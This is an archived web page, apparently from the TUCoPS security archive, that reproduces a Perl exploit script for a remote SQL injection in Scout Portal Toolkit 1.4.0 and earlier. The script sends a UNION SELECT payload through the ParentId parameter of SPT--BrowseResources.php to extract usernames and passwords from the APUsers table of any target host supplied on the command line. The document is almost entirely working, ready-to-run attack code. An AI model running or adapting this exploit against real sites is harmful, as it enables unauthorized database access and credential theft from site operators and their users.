TUCoPS :: Web :: CMS / Portals :: bx3055.htm

Scout Portal Toolkit <= 1.4.0 (ParentId) Remote SQL Injection Exploit
Scout Portal Toolkit <= 1.4.0 (ParentId) Remote SQL Injection Exploit
Scout Portal Toolkit <= 1.4.0 (ParentId) Remote SQL Injection Exploit


#!/usr/bin/perl=0D
=0D
# Scout Portal Toolkit <= 1.4.0 (ParentId) Remote SQL Injection Exploit=0D
# Discovered & Coded by JosS=0D
# Contact: sys-project[at]hotmail.com=0D
# Spanish Hackers Team / Sys - Project / EspSeC=0D
# http://www.spanish-hackers.com=0D 
# rgod forever :D=0D
=0D
=0D
print "\t\t########################################################\n\n";=0D
print "\t\t#  Scout Portal Toolkit <= 1.4.0 SQL Injection Exploit #\n\n";=0D
print "\t\t#                       by JosS                        #\n\n";=0D
print "\t\t########################################################\n\n";=0D
=0D
use strict;=0D
use LWP::UserAgent;=0D
=0D
my $victim = $ARGV[0];=0D
=0D
 if(!$ARGV[0]) {=0D
    print "\n[x] Scout Portal Toolkit <= 1.4.0 Remote SQL Injection Exploit\n";=0D
    print "[x] written by JosS - sys-project[at]hotmail.com\n";=0D
    print "[x] usage: perl xpl.pl [host]\n";=0D
print "[x] example: http://localhost/path/\n\n";=0D 
    exit(1);=0D
 }=0D
 =0D
    print "\n[+] Exploiting...\n";=0D
    my $cnx = LWP::UserAgent->new() or die;=0D
    my $go=$cnx->get($victim."/SPT--BrowseResources.php?ParentId=337+and+1=2+union+all+select+0,1,2,3,4,concat(UserName,char(34),UserPassword),6,7,8+from+APUsers/*");=0D
    if ($go->content =~ m/APUsers\/\*\' class=\'\'>(.*?)\<\/a>/ms)=0D
 {=0D
        print "[+] $1\n\n";=0D
    } else {=0D
        print "\n[-] exploit failed\n";=0D
    }=0D

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH